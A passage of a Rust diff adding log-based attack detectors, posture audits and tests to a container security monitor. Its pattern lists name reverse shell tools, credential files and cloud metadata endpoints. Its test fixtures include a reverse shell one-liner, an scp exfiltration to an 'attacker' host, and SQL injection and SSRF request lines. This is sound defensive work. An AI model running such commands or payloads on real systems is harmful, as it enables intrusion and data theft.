    /// Builds a [`LogAnomaly`] from this finding.
    ///
    /// Description, severity, and sample line are copied as-is. The detector id,
    /// the family (rendered through its `Display` impl), and the confidence are
    /// attached as the anomaly's optional detector fields.
    pub fn to_log_anomaly(&self) -> LogAnomaly {
        LogAnomaly {
            description: self.description.clone(),
            severity: self.severity.clone(),
            sample_line: self.sample_line.clone(),
            detector_id: Some(self.detector_id.clone()),
            detector_family: Some(self.family.to_string()),
            confidence: Some(self.confidence),
        }
    }
}

/// Detector contract for log-entry based detectors.
pub trait LogDetector: Send + Sync {
    /// Static identifier of the detector; the built-in detectors use it as the
    /// `detector_id` of the findings they emit.
    fn id(&self) -> &'static str;
    /// Family under which this detector's findings are reported.
    fn family(&self) -> DetectorFamily;
    /// Inspects a batch of log entries and returns the findings it produced; an
    /// empty vector means nothing was detected.
    fn detect(&self, entries: &[LogEntry]) -> Vec<DetectorFinding>;
}
self.register(ExfiltrationChainDetector); + self.register(SecretLeakageDetector); + } + + pub fn detect_log_anomalies(&self, entries: &[LogEntry]) -> Vec { + let mut anomalies = Vec::new(); + let mut fingerprints = HashSet::new(); + + for detector in &self.detectors { + for finding in detector.detect(entries) { + let fingerprint = format!( + "{}:{}:{}", + finding.detector_id, finding.description, finding.sample_line + ); + if fingerprints.insert(fingerprint) { + anomalies.push(finding.to_log_anomaly()); + } + } + } + + anomalies + } + + pub fn detect_file_integrity_anomalies( + &self, + pool: &DbPool, + paths: &[String], + ) -> Result> { + Ok(self + .integrity_monitor + .detect(pool, paths)? + .into_iter() + .map(|finding| finding.to_log_anomaly()) + .collect()) + } + + pub fn detect_config_assessment_anomalies(&self, paths: &[String]) -> Result> { + Ok(self + .config_assessment_monitor + .detect(paths)? + .into_iter() + .map(|finding| finding.to_log_anomaly()) + .collect()) + } + + pub fn detect_package_inventory_anomalies(&self, paths: &[String]) -> Result> { + Ok(self + .package_inventory_monitor + .detect(paths)? 
+ .into_iter() + .map(|finding| finding.to_log_anomaly()) + .collect()) + } + + pub fn detect_docker_posture_anomalies( + &self, + postures: &[ContainerPosture], + ) -> Vec { + self.docker_posture_monitor + .detect(postures) + .into_iter() + .map(|finding| finding.to_log_anomaly()) + .collect() + } +} + +impl Default for DetectorRegistry { + fn default() -> Self { + let mut registry = Self::new(); + registry.register_builtin_log_detectors(); + registry + } +} + +struct SqlInjectionProbeDetector; +struct PathTraversalDetector; +struct LoginBruteForceDetector; +struct WebshellProbeDetector; +struct ExfiltrationHeuristicDetector; +struct ReverseShellDetector; +struct SensitiveFileAccessDetector; +struct SsrfMetadataDetector; +struct ExfiltrationChainDetector; +struct SecretLeakageDetector; + +impl LogDetector for SqlInjectionProbeDetector { + fn id(&self) -> &'static str { + "web.sqli-probe" + } + + fn family(&self) -> DetectorFamily { + DetectorFamily::Web + } + + fn detect(&self, entries: &[LogEntry]) -> Vec { + let matches = matching_entries( + entries, + &[ + "union select", + "or 1=1", + "sleep(", + "benchmark(", + "information_schema", + "sql syntax", + "select%20", + ], + ); + + if matches.len() < 2 { + return Vec::new(); + } + + vec![DetectorFinding { + detector_id: self.id().to_string(), + family: self.family(), + description: format!( + "Potential SQL injection probing detected in {} log entries", + matches.len() + ), + severity: threshold_severity(matches.len(), 2, 5), + confidence: 84, + sample_line: matches[0].line.clone(), + }] + } +} + +impl LogDetector for PathTraversalDetector { + fn id(&self) -> &'static str { + "web.path-traversal" + } + + fn family(&self) -> DetectorFamily { + DetectorFamily::Web + } + + fn detect(&self, entries: &[LogEntry]) -> Vec { + let matches = matching_entries( + entries, + &["../", "..%2f", "%2e%2e%2f", "/etc/passwd", "win.ini"], + ); + + if matches.is_empty() { + return Vec::new(); + } + + vec![DetectorFinding { + 
detector_id: self.id().to_string(), + family: self.family(), + description: format!( + "Path traversal probing indicators found in {} log entries", + matches.len() + ), + severity: threshold_severity(matches.len(), 1, 4), + confidence: 82, + sample_line: matches[0].line.clone(), + }] + } +} + +impl LogDetector for LoginBruteForceDetector { + fn id(&self) -> &'static str { + "web.login-bruteforce" + } + + fn family(&self) -> DetectorFamily { + DetectorFamily::Web + } + + fn detect(&self, entries: &[LogEntry]) -> Vec { + let matches = matching_entries( + entries, + &[ + "failed password", + "authentication failure", + "invalid user", + "login failed", + "too many login failures", + "401", + ], + ); + + if matches.len() < 5 { + return Vec::new(); + } + + vec![DetectorFinding { + detector_id: self.id().to_string(), + family: self.family(), + description: format!( + "Repeated authentication failures suggest a brute-force attempt ({} matching entries)", + matches.len() + ), + severity: threshold_severity(matches.len(), 5, 10), + confidence: 78, + sample_line: matches[0].line.clone(), + }] + } +} + +impl LogDetector for WebshellProbeDetector { + fn id(&self) -> &'static str { + "web.webshell-probe" + } + + fn family(&self) -> DetectorFamily { + DetectorFamily::Web + } + + fn detect(&self, entries: &[LogEntry]) -> Vec { + let matches = matching_entries( + entries, + &[ + "cmd=", + "exec=", + "shell=", + "powershell", + "/bin/sh", + "wget http", + "curl http", + "c99", + "r57", + ], + ); + + if matches.is_empty() { + return Vec::new(); + } + + vec![DetectorFinding { + detector_id: self.id().to_string(), + family: self.family(), + description: "Webshell or remote command execution probing indicators detected" + .to_string(), + severity: AnomalySeverity::High, + confidence: 88, + sample_line: matches[0].line.clone(), + }] + } +} + +impl LogDetector for ExfiltrationHeuristicDetector { + fn id(&self) -> &'static str { + "exfiltration.egress-heuristic" + } + + fn family(&self) 
-> DetectorFamily { + DetectorFamily::Exfiltration + } + + fn detect(&self, entries: &[LogEntry]) -> Vec { + let command_matches = matching_entries( + entries, + &[ + "sendmail", + "postfix/smtp", + "smtp", + "curl -t", + "scp ", + "rsync ", + "aws s3 cp", + "gpg --encrypt", + "exfil", + "attachment", + "bytes sent", + "uploaded", + ], + ); + let large_transfer_matches: Vec<&LogEntry> = entries + .iter() + .filter(|entry| line_has_large_transfer(&entry.line)) + .collect(); + + let score = command_matches.len() + large_transfer_matches.len(); + if score < 2 { + return Vec::new(); + } + + let sample = command_matches + .first() + .copied() + .or_else(|| large_transfer_matches.first().copied()) + .expect("score >= 2 guarantees at least one match"); + + vec![DetectorFinding { + detector_id: self.id().to_string(), + family: self.family(), + description: format!( + "Possible outbound data exfiltration activity detected ({} suspicious transfer indicators)", + score + ), + severity: threshold_severity(score, 2, 5), + confidence: if !large_transfer_matches.is_empty() { 86 } else { 74 }, + sample_line: sample.line.clone(), + }] + } +} + +impl LogDetector for ReverseShellDetector { + fn id(&self) -> &'static str { + "execution.reverse-shell" + } + + fn family(&self) -> DetectorFamily { + DetectorFamily::Execution + } + + fn detect(&self, entries: &[LogEntry]) -> Vec { + let shell_matches = matching_entries( + entries, + &[ + "bash -i", + "/dev/tcp/", + "nc -e", + "ncat -e", + "mkfifo /tmp/", + "python -c", + "import socket", + "pty.spawn", + "socat tcp", + "powershell -nop", + ], + ); + let network_matches = matching_entries( + entries, + &[ + "connect to ", + "dial tcp", + "connection to ", + "remote host", + "reverse shell", + "listening on", + ], + ); + + if shell_matches.is_empty() || network_matches.is_empty() { + return Vec::new(); + } + + vec![DetectorFinding { + detector_id: self.id().to_string(), + family: self.family(), + description: "Potential reverse shell 
behavior detected from shell execution plus network activity".to_string(), + severity: AnomalySeverity::Critical, + confidence: 91, + sample_line: shell_matches[0].line.clone(), + }] + } +} + +impl LogDetector for SensitiveFileAccessDetector { + fn id(&self) -> &'static str { + "file.sensitive-access" + } + + fn family(&self) -> DetectorFamily { + DetectorFamily::FileAccess + } + + fn detect(&self, entries: &[LogEntry]) -> Vec { + let matches = matching_entries( + entries, + &[ + "/etc/shadow", + "/root/.ssh/id_rsa", + "/home/", + ".aws/credentials", + ".kube/config", + ".env", + "authorized_keys", + "known_hosts", + "secrets.yaml", + ], + ) + .into_iter() + .filter(|entry| { + contains_any( + &entry.line, + &["open", "read", "cat", "cp ", "access", "download"], + ) + }) + .collect::>(); + + if matches.is_empty() { + return Vec::new(); + } + + vec![DetectorFinding { + detector_id: self.id().to_string(), + family: self.family(), + description: format!( + "Sensitive file access indicators detected in {} log entries", + matches.len() + ), + severity: threshold_severity(matches.len(), 1, 3), + confidence: 87, + sample_line: matches[0].line.clone(), + }] + } +} + +impl LogDetector for SsrfMetadataDetector { + fn id(&self) -> &'static str { + "cloud.metadata-ssrf" + } + + fn family(&self) -> DetectorFamily { + DetectorFamily::Cloud + } + + fn detect(&self, entries: &[LogEntry]) -> Vec { + let matches = matching_entries( + entries, + &[ + "169.254.169.254", + "latest/meta-data", + "metadata.google.internal", + "computemetadata/v1", + "/metadata/instance", + "x-aws-ec2-metadata-token", + ], + ); + + if matches.is_empty() { + return Vec::new(); + } + + vec![DetectorFinding { + detector_id: self.id().to_string(), + family: self.family(), + description: "Possible SSRF or direct cloud metadata access detected".to_string(), + severity: threshold_severity(matches.len(), 1, 3), + confidence: 89, + sample_line: matches[0].line.clone(), + }] + } +} + +impl LogDetector for 
ExfiltrationChainDetector { + fn id(&self) -> &'static str { + "exfiltration.chain" + } + + fn family(&self) -> DetectorFamily { + DetectorFamily::Exfiltration + } + + fn detect(&self, entries: &[LogEntry]) -> Vec { + let archive_matches = matching_entries( + entries, + &[ + "tar cz", + "zip -r", + "gzip ", + "7z a", + "gpg --encrypt", + "openssl enc", + "archive created", + ], + ); + let transfer_matches = matching_entries( + entries, + &[ + "scp ", + "rsync ", + "curl -t", + "aws s3 cp", + "sendmail", + "smtp", + "ftp put", + "upload complete", + ], + ); + + if archive_matches.is_empty() || transfer_matches.is_empty() { + return Vec::new(); + } + + vec![DetectorFinding { + detector_id: self.id().to_string(), + family: self.family(), + description: "Possible exfiltration chain detected: archive/encrypt followed by outbound transfer".to_string(), + severity: AnomalySeverity::High, + confidence: 90, + sample_line: archive_matches[0].line.clone(), + }] + } +} + +impl LogDetector for SecretLeakageDetector { + fn id(&self) -> &'static str { + "secrets.log-leakage" + } + + fn family(&self) -> DetectorFamily { + DetectorFamily::Secrets + } + + fn detect(&self, entries: &[LogEntry]) -> Vec { + let matches: Vec<&LogEntry> = entries + .iter() + .filter(|entry| line_contains_secret(&entry.line)) + .collect(); + + if matches.is_empty() { + return Vec::new(); + } + + vec![DetectorFinding { + detector_id: self.id().to_string(), + family: self.family(), + description: format!( + "Potential secret leakage detected in {} log entries", + matches.len() + ), + severity: threshold_severity(matches.len(), 1, 2), + confidence: 92, + sample_line: matches[0].line.clone(), + }] + } +} + +fn matching_entries<'a>(entries: &'a [LogEntry], patterns: &[&str]) -> Vec<&'a LogEntry> { + entries + .iter() + .filter(|entry| contains_any(&entry.line, patterns)) + .collect() +} + +fn contains_any(line: &str, patterns: &[&str]) -> bool { + let lower = line.to_ascii_lowercase(); + 
/// Reports whether `line` advertises a transfer of at least one million bytes
/// through a `bytes=<n>` or `size=<n>` field (matched case-insensitively).
///
/// Both fields are checked independently, so a small `bytes=` value does not hide
/// a large `size=` value on the same line.
fn line_has_large_transfer(line: &str) -> bool {
    const LARGE_TRANSFER_BYTES: u64 = 1_000_000;

    ["bytes=", "size="].iter().any(|needle| {
        extract_named_number(line, needle).is_some_and(|value| value >= LARGE_TRANSFER_BYTES)
    })
}

/// Parses the run of ASCII digits that directly follows the first occurrence of
/// `needle` in `line`.
///
/// The search is case-insensitive on `line`; `needle` must already be lowercase.
/// Returns `None` when the needle is absent or is not immediately followed by a
/// digit. A digit run too long for `u64` saturates to `u64::MAX` rather than
/// being discarded, so absurdly large values still register as large.
fn extract_named_number(line: &str, needle: &str) -> Option<u64> {
    let lower = line.to_ascii_lowercase();
    let start = lower.find(needle)? + needle.len();
    let rest = &lower[start..];
    let end = rest
        .find(|ch: char| !ch.is_ascii_digit())
        .unwrap_or(rest.len());
    let digits = &rest[..end];

    if digits.is_empty() {
        return None;
    }

    // The slice holds ASCII digits only, so the sole parse failure is overflow.
    Some(digits.parse::<u64>().unwrap_or(u64::MAX))
}
/// Reports whether `line` contains a GitHub token prefix (case-insensitive).
///
/// Covers personal access tokens (`ghp_`, `github_pat_`), OAuth tokens (`gho_`),
/// user-to-server and server-to-server tokens (`ghu_`, `ghs_`), and refresh
/// tokens (`ghr_`). Only the prefix is checked, not the token body.
fn contains_github_token(line: &str) -> bool {
    const GITHUB_TOKEN_PREFIXES: [&str; 6] =
        ["ghp_", "github_pat_", "gho_", "ghu_", "ghs_", "ghr_"];

    let lower = line.to_ascii_lowercase();
    GITHUB_TOKEN_PREFIXES
        .iter()
        .any(|prefix| lower.contains(*prefix))
}
assert!(!line_has_large_transfer("uploaded bytes=1024")); + } + + #[test] + fn test_registry_detects_reverse_shell() { + let registry = DetectorRegistry::default(); + let anomalies = registry.detect_log_anomalies(&make_entries(&[ + "bash -i >& /dev/tcp/203.0.113.10/4444 0>&1", + "connection to remote host 203.0.113.10 established", + ])); + + assert!(anomalies + .iter() + .any(|item| item.detector_id.as_deref() == Some("execution.reverse-shell"))); + } + + #[test] + fn test_registry_detects_sensitive_file_access() { + let registry = DetectorRegistry::default(); + let anomalies = registry.detect_log_anomalies(&make_entries(&[ + "openat path=/etc/shadow pid=1234", + "read /etc/shadow by suspicious process", + ])); + + assert!(anomalies + .iter() + .any(|item| item.detector_id.as_deref() == Some("file.sensitive-access"))); + } + + #[test] + fn test_registry_detects_metadata_ssrf() { + let registry = DetectorRegistry::default(); + let anomalies = registry.detect_log_anomalies(&make_entries(&[ + "GET http://169.254.169.254/latest/meta-data/iam/security-credentials/", + ])); + + assert!(anomalies + .iter() + .any(|item| item.detector_id.as_deref() == Some("cloud.metadata-ssrf"))); + } + + #[test] + fn test_registry_detects_exfiltration_chain() { + let registry = DetectorRegistry::default(); + let anomalies = registry.detect_log_anomalies(&make_entries(&[ + "tar czf /tmp/archive.tgz /srv/data", + "scp /tmp/archive.tgz attacker@203.0.113.5:/tmp/", + ])); + + assert!(anomalies + .iter() + .any(|item| item.detector_id.as_deref() == Some("exfiltration.chain"))); + } + + #[test] + fn test_registry_detects_secret_leakage() { + let registry = DetectorRegistry::default(); + let anomalies = registry.detect_log_anomalies(&make_entries(&[ + "Authorization: Bearer super-secret-token", + "AWS_SECRET_ACCESS_KEY=abc123", + ])); + + assert!(anomalies + .iter() + .any(|item| item.detector_id.as_deref() == Some("secrets.log-leakage"))); + } + + #[test] + fn 
test_secret_detectors_identify_provider_specific_tokens() { + assert!(contains_github_token("github_pat_1234567890")); + assert!(contains_aws_access_key("AKIAABCDEFGHIJKLMNOP")); + assert!(!contains_aws_access_key("AKIAshort")); + } +} diff --git a/src/docker/client.rs b/src/docker/client.rs index 44211d8..9efbaba 100644 --- a/src/docker/client.rs +++ b/src/docker/client.rs @@ -93,6 +93,63 @@ impl DockerClient { }) } + /// Get posture information by ID for detector-backed audits + pub async fn get_container_posture( + &self, + container_id: &str, + ) -> Result { + let inspect = self + .client + .inspect_container(container_id, None::) + .await + .context("Failed to inspect container")?; + + let config = inspect.config.unwrap_or_default(); + let host_config = inspect.host_config.unwrap_or_default(); + + Ok(crate::detectors::ContainerPosture { + container_id: container_id.to_string(), + name: inspect + .name + .unwrap_or_else(|| container_id[..12].to_string()) + .trim_start_matches('/') + .to_string(), + image: config.image.unwrap_or_else(|| "unknown".to_string()), + privileged: host_config.privileged.unwrap_or(false), + network_mode: host_config.network_mode.filter(|value| !value.is_empty()), + pid_mode: host_config.pid_mode.filter(|value| !value.is_empty()), + cap_add: host_config.cap_add.unwrap_or_default(), + mounts: host_config.binds.unwrap_or_default(), + }) + } + + /// List container posture information for detector-backed audits + pub async fn list_container_postures( + &self, + all: bool, + ) -> Result> { + let options: Option> = Some(ListContainersOptions { + all, + size: false, + ..Default::default() + }); + + let containers = self + .client + .list_containers(options) + .await + .context("Failed to list containers for posture audit")?; + + let mut result = Vec::new(); + for container in containers { + if let Some(id) = container.id { + result.push(self.get_container_posture(&id).await?); + } + } + + Ok(result) + } + /// Quarantine a container (disconnect 
from all networks) pub async fn quarantine_container(&self, container_id: &str) -> Result<()> { // List all networks diff --git a/src/lib.rs b/src/lib.rs index 1f663f0..0888f58 100644 --- a/src/lib.rs +++ b/src/lib.rs @@ -50,6 +50,7 @@ pub mod collectors; pub mod baselines; pub mod correlator; pub mod database; +pub mod detectors; pub mod docker; pub mod ip_ban; pub mod ml; diff --git a/src/main.rs b/src/main.rs index 041c13d..2f17e37 100644 --- a/src/main.rs +++ b/src/main.rs @@ -203,6 +203,18 @@ async fn run_sniff(config: sniff::config::SniffConfig) -> io::Result<()> { info!("Consume: {}", config.consume); info!("Output: {}", config.output_dir.display()); info!("Interval: {}s", config.interval_secs); + if !config.integrity_paths.is_empty() { + info!("FIM Paths: {}", config.integrity_paths.len()); + } + if !config.config_assessment_paths.is_empty() { + info!("SCA Paths: {}", config.config_assessment_paths.len()); + } + if !config.package_inventory_paths.is_empty() { + info!( + "Package Inventories: {}", + config.package_inventory_paths.len() + ); + } info!("AI Provider: {:?}", config.ai_provider); info!("AI Model: {}", config.ai_model); info!("AI API URL: {}", config.ai_api_url); diff --git a/src/sniff/analyzer.rs b/src/sniff/analyzer.rs index 26a720f..05a7d45 100644 --- a/src/sniff/analyzer.rs +++ b/src/sniff/analyzer.rs @@ -36,10 +36,16 @@ pub struct LogAnomaly { pub description: String, pub severity: AnomalySeverity, pub sample_line: String, + #[serde(skip_serializing_if = "Option::is_none")] + pub detector_id: Option, + #[serde(skip_serializing_if = "Option::is_none")] + pub detector_family: Option, + #[serde(skip_serializing_if = "Option::is_none")] + pub confidence: Option, } /// Severity of a detected anomaly -#[derive(Debug, Clone, PartialEq, Serialize, Deserialize)] +#[derive(Debug, Clone, PartialEq, Eq, Serialize, Deserialize)] pub enum AnomalySeverity { Low, Medium, @@ -328,6 +334,9 @@ fn parse_llm_response(source_id: &str, entries: &[LogEntry], 
raw_json: &str) -> description: a.description.unwrap_or_default(), severity: parse_severity(&a.severity.unwrap_or_default()), sample_line: a.sample_line.unwrap_or_default(), + detector_id: None, + detector_family: None, + confidence: None, }) .collect(); @@ -554,6 +563,9 @@ impl LogAnalyzer for PatternAnalyzer { ), severity: AnomalySeverity::High, sample_line: sample.line.clone(), + detector_id: None, + detector_family: None, + confidence: None, }); } } @@ -862,6 +874,9 @@ mod tests { description: "Test anomaly".into(), severity: AnomalySeverity::Medium, sample_line: "WARN: something".into(), + detector_id: None, + detector_family: None, + confidence: None, }], }; let json = serde_json::to_string(&summary).unwrap(); diff --git a/src/sniff/config.rs b/src/sniff/config.rs index cee76bf..c147a69 100644 --- a/src/sniff/config.rs +++ b/src/sniff/config.rs @@ -36,6 +36,12 @@ pub struct SniffConfig { pub output_dir: PathBuf, /// Additional log source paths (user-configured) pub extra_sources: Vec, + /// Explicit file or directory paths to monitor for integrity drift + pub integrity_paths: Vec, + /// Explicit config files to audit for insecure settings + pub config_assessment_paths: Vec, + /// Explicit package inventory files to audit for legacy versions + pub package_inventory_paths: Vec, /// Poll interval in seconds pub interval_secs: u64, /// AI provider to use for summarization @@ -102,6 +108,25 @@ impl SniffConfig { } } + let integrity_paths = env::var("STACKDOG_FIM_PATHS") + .unwrap_or_default() + .split(',') + .map(|s| s.trim().to_string()) + .filter(|s| !s.is_empty()) + .collect(); + let config_assessment_paths = env::var("STACKDOG_SCA_PATHS") + .unwrap_or_default() + .split(',') + .map(|s| s.trim().to_string()) + .filter(|s| !s.is_empty()) + .collect(); + let package_inventory_paths = env::var("STACKDOG_PACKAGE_INVENTORY_PATHS") + .unwrap_or_default() + .split(',') + .map(|s| s.trim().to_string()) + .filter(|s| !s.is_empty()) + .collect(); + let ai_provider_str = 
args.ai_provider.map(|s| s.to_string()).unwrap_or_else(|| { env::var("STACKDOG_AI_PROVIDER").unwrap_or_else(|_| "openai".into()) }); @@ -128,6 +153,9 @@ impl SniffConfig { consume: args.consume, output_dir, extra_sources, + integrity_paths, + config_assessment_paths, + package_inventory_paths, interval_secs, ai_provider: ai_provider_str.parse().unwrap(), ai_api_url: args @@ -193,6 +221,9 @@ mod tests { fn clear_sniff_env() { env::remove_var("STACKDOG_LOG_SOURCES"); + env::remove_var("STACKDOG_FIM_PATHS"); + env::remove_var("STACKDOG_SCA_PATHS"); + env::remove_var("STACKDOG_PACKAGE_INVENTORY_PATHS"); env::remove_var("STACKDOG_AI_PROVIDER"); env::remove_var("STACKDOG_AI_API_URL"); env::remove_var("STACKDOG_AI_API_KEY"); @@ -243,6 +274,9 @@ mod tests { assert!(!config.consume); assert_eq!(config.output_dir, PathBuf::from("./stackdog-logs/")); assert!(config.extra_sources.is_empty()); + assert!(config.integrity_paths.is_empty()); + assert!(config.config_assessment_paths.is_empty()); + assert!(config.package_inventory_paths.is_empty()); assert_eq!(config.interval_secs, 30); assert_eq!(config.ai_provider, AiProvider::OpenAi); assert_eq!(config.ai_api_url, "http://localhost:11434/v1"); @@ -319,6 +353,84 @@ mod tests { clear_sniff_env(); } + #[test] + fn test_sniff_config_fim_paths_from_env() { + let _lock = ENV_MUTEX.lock().unwrap(); + clear_sniff_env(); + env::set_var("STACKDOG_FIM_PATHS", "/etc/ssh/sshd_config, /app/.env"); + + let config = SniffConfig::from_env_and_args(SniffArgs { + once: false, + consume: false, + output: "./stackdog-logs/", + sources: None, + interval: 30, + ai_provider: None, + ai_model: None, + ai_api_url: None, + slack_webhook: None, + webhook_url: None, + smtp_host: None, + smtp_port: None, + smtp_user: None, + smtp_password: None, + email_recipients: None, + }); + + assert_eq!( + config.integrity_paths, + vec!["/etc/ssh/sshd_config".to_string(), "/app/.env".to_string()] + ); + + clear_sniff_env(); + } + + #[test] + fn 
test_sniff_config_audit_paths_from_env() { + let _lock = ENV_MUTEX.lock().unwrap(); + clear_sniff_env(); + env::set_var("STACKDOG_SCA_PATHS", "/etc/ssh/sshd_config,/etc/sudoers"); + env::set_var( + "STACKDOG_PACKAGE_INVENTORY_PATHS", + "/var/lib/dpkg/status,/lib/apk/db/installed", + ); + + let config = SniffConfig::from_env_and_args(SniffArgs { + once: false, + consume: false, + output: "./stackdog-logs/", + sources: None, + interval: 30, + ai_provider: None, + ai_model: None, + ai_api_url: None, + slack_webhook: None, + webhook_url: None, + smtp_host: None, + smtp_port: None, + smtp_user: None, + smtp_password: None, + email_recipients: None, + }); + + assert_eq!( + config.config_assessment_paths, + vec![ + "/etc/ssh/sshd_config".to_string(), + "/etc/sudoers".to_string() + ] + ); + assert_eq!( + config.package_inventory_paths, + vec![ + "/var/lib/dpkg/status".to_string(), + "/lib/apk/db/installed".to_string() + ] + ); + + clear_sniff_env(); + } + #[test] fn test_sniff_config_env_overrides_defaults() { let _lock = ENV_MUTEX.lock().unwrap(); diff --git a/src/sniff/mod.rs b/src/sniff/mod.rs index 8a3d07d..f009cc6 100644 --- a/src/sniff/mod.rs +++ b/src/sniff/mod.rs @@ -13,6 +13,8 @@ pub mod reporter; use crate::alerting::notifications::NotificationConfig; use crate::database::connection::{create_pool, init_database, DbPool}; use crate::database::repositories::log_sources as log_sources_repo; +use crate::detectors::DetectorRegistry; +use crate::docker::DockerClient; use crate::ip_ban::{IpBanConfig, IpBanEngine, OffenseInput}; use crate::sniff::analyzer::{LogAnalyzer, PatternAnalyzer}; use crate::sniff::config::SniffConfig; @@ -21,11 +23,13 @@ use crate::sniff::discovery::LogSourceType; use crate::sniff::reader::{DockerLogReader, FileLogReader, LogReader}; use crate::sniff::reporter::Reporter; use anyhow::Result; +use chrono::Utc; /// Main orchestrator for the sniff command pub struct SniffOrchestrator { config: SniffConfig, pool: DbPool, + detectors: DetectorRegistry, 
reporter: Reporter, ip_ban: Option, } @@ -67,6 +71,7 @@ impl SniffOrchestrator { Ok(Self { config, pool, + detectors: DetectorRegistry::default(), reporter, ip_ban, }) @@ -123,6 +128,49 @@ impl SniffOrchestrator { pub async fn run_once(&self) -> Result { let mut result = SniffPassResult::default(); + self.report_detector_batch( + &mut result, + "file-integrity", + self.config.integrity_paths.len(), + "File integrity monitoring", + self.detectors + .detect_file_integrity_anomalies(&self.pool, &self.config.integrity_paths)?, + ) + .await?; + self.report_detector_batch( + &mut result, + "config-assessment", + self.config.config_assessment_paths.len(), + "Configuration assessment", + self.detectors + .detect_config_assessment_anomalies(&self.config.config_assessment_paths)?, + ) + .await?; + self.report_detector_batch( + &mut result, + "package-audit", + self.config.package_inventory_paths.len(), + "Package inventory audit", + self.detectors + .detect_package_inventory_anomalies(&self.config.package_inventory_paths)?, + ) + .await?; + + match DockerClient::new().await { + Ok(docker) => { + let postures = docker.list_container_postures(true).await?; + self.report_detector_batch( + &mut result, + "docker-posture", + postures.len(), + "Docker posture audit", + self.detectors.detect_docker_posture_anomalies(&postures), + ) + .await?; + } + Err(err) => log::debug!("Skipping Docker posture audit: {}", err), + } + // 1. Discover sources log::debug!("Step 1: discovering log sources..."); let sources = discovery::discover_all(&self.config.extra_sources).await?; @@ -168,7 +216,17 @@ impl SniffOrchestrator { // 4. 
Analyze log::debug!("Step 4: analyzing {} entries...", entries.len()); - let summary = analyzer.summarize(&entries).await?; + let mut summary = analyzer.summarize(&entries).await?; + let detector_anomalies = self.detectors.detect_log_anomalies(&entries); + if !detector_anomalies.is_empty() { + summary.key_events.extend( + detector_anomalies + .iter() + .take(5) + .map(|anomaly| anomaly.description.clone()), + ); + summary.anomalies.extend(detector_anomalies); + } log::debug!( " Analysis complete: {} errors, {} warnings, {} anomalies", summary.error_count, @@ -250,6 +308,38 @@ impl SniffOrchestrator { Ok(()) } + async fn report_detector_batch( + &self, + result: &mut SniffPassResult, + source_id: &str, + total_entries: usize, + label: &str, + anomalies: Vec, + ) -> Result<()> { + if anomalies.is_empty() { + return Ok(()); + } + + let summary = analyzer::LogSummary { + source_id: source_id.into(), + period_start: Utc::now(), + period_end: Utc::now(), + total_entries, + summary_text: format!("{} detected {} anomaly entries", label, anomalies.len()), + error_count: 0, + warning_count: 0, + key_events: anomalies + .iter() + .take(5) + .map(|anomaly| anomaly.description.clone()) + .collect(), + anomalies, + }; + let report = self.reporter.report(&summary, Some(&self.pool)).await?; + result.anomalies_found += report.anomalies_reported; + Ok(()) + } + /// Run the sniff loop (continuous or one-shot) pub async fn run(&self) -> Result<()> { log::info!("🔍 Sniff orchestrator started"); @@ -350,6 +440,9 @@ mod tests { description: "Repeated failed ssh login".into(), severity, sample_line: sample_line.into(), + detector_id: None, + detector_family: None, + confidence: None, }], } } @@ -426,6 +519,133 @@ mod tests { assert!(result.total_entries >= 3); } + #[tokio::test] + async fn test_orchestrator_applies_builtin_detectors_to_log_entries() { + use std::io::Write; + let dir = tempfile::tempdir().unwrap(); + let log_path = dir.path().join("attacks.log"); + { + let mut f = 
std::fs::File::create(&log_path).unwrap(); + writeln!(f, r#"GET /search?q=' OR 1=1 -- HTTP/1.1"#).unwrap(); + writeln!( + f, + r#"GET /search?q=UNION SELECT password FROM users HTTP/1.1"# + ) + .unwrap(); + writeln!(f, "sendmail invoked for attachment bytes=2000000").unwrap(); + writeln!(f, "smtp delivery queued bytes=3000000").unwrap(); + } + + let mut config = SniffConfig::from_env_and_args(config::SniffArgs { + once: true, + consume: false, + output: "./stackdog-logs/", + sources: Some(&log_path.to_string_lossy()), + interval: 30, + ai_provider: Some("candle"), + ai_model: None, + ai_api_url: None, + slack_webhook: None, + webhook_url: None, + smtp_host: None, + smtp_port: None, + smtp_user: None, + smtp_password: None, + email_recipients: None, + }); + config.database_url = ":memory:".into(); + + let orchestrator = SniffOrchestrator::new(config).unwrap(); + let result = orchestrator.run_once().await.unwrap(); + + assert!(result.anomalies_found >= 2); + } + + #[tokio::test] + async fn test_orchestrator_reports_file_integrity_drift() { + let dir = tempfile::tempdir().unwrap(); + let monitored = dir.path().join("app.env"); + std::fs::write(&monitored, "TOKEN=first").unwrap(); + + let mut config = memory_sniff_config(); + config.integrity_paths = vec![monitored.to_string_lossy().into_owned()]; + + let orchestrator = SniffOrchestrator::new(config).unwrap(); + orchestrator.run_once().await.unwrap(); + + std::fs::write(&monitored, "TOKEN=second").unwrap(); + let result = orchestrator.run_once().await.unwrap(); + + assert!(result.anomalies_found >= 1); + + let alerts = list_alerts(&orchestrator.pool, AlertFilter::default()) + .await + .unwrap(); + assert!(alerts.iter().any(|alert| { + alert + .metadata + .as_ref() + .and_then(|metadata| metadata.extra.get("detector_id").map(String::as_str)) + == Some("integrity.file-baseline") + })); + } + + #[tokio::test] + async fn test_orchestrator_reports_config_assessment_findings() { + let dir = tempfile::tempdir().unwrap(); + 
let sshd = dir.path().join("sshd_config"); + std::fs::write(&sshd, "PermitRootLogin yes\nPasswordAuthentication yes\n").unwrap(); + + let mut config = memory_sniff_config(); + config.config_assessment_paths = vec![sshd.to_string_lossy().into_owned()]; + + let orchestrator = SniffOrchestrator::new(config).unwrap(); + let result = orchestrator.run_once().await.unwrap(); + + assert!(result.anomalies_found >= 1); + + let alerts = list_alerts(&orchestrator.pool, AlertFilter::default()) + .await + .unwrap(); + assert!(alerts.iter().any(|alert| { + alert + .metadata + .as_ref() + .and_then(|metadata| metadata.extra.get("detector_id").map(String::as_str)) + == Some("config.ssh-root-login") + })); + } + + #[tokio::test] + async fn test_orchestrator_reports_package_inventory_findings() { + let dir = tempfile::tempdir().unwrap(); + let status = dir.path().join("status"); + std::fs::write( + &status, + "Package: openssl\nVersion: 1.0.2u-1\n\nPackage: bash\nVersion: 4.3-1\n", + ) + .unwrap(); + + let mut config = memory_sniff_config(); + config.package_inventory_paths = vec![status.to_string_lossy().into_owned()]; + + let orchestrator = SniffOrchestrator::new(config).unwrap(); + let result = orchestrator.run_once().await.unwrap(); + + assert!(result.anomalies_found >= 1); + + let alerts = list_alerts(&orchestrator.pool, AlertFilter::default()) + .await + .unwrap(); + assert!(alerts.iter().any(|alert| { + alert + .metadata + .as_ref() + .and_then(|metadata| metadata.extra.get("detector_id").map(String::as_str)) + == Some("vuln.legacy-package") + })); + } + #[actix_rt::test] async fn 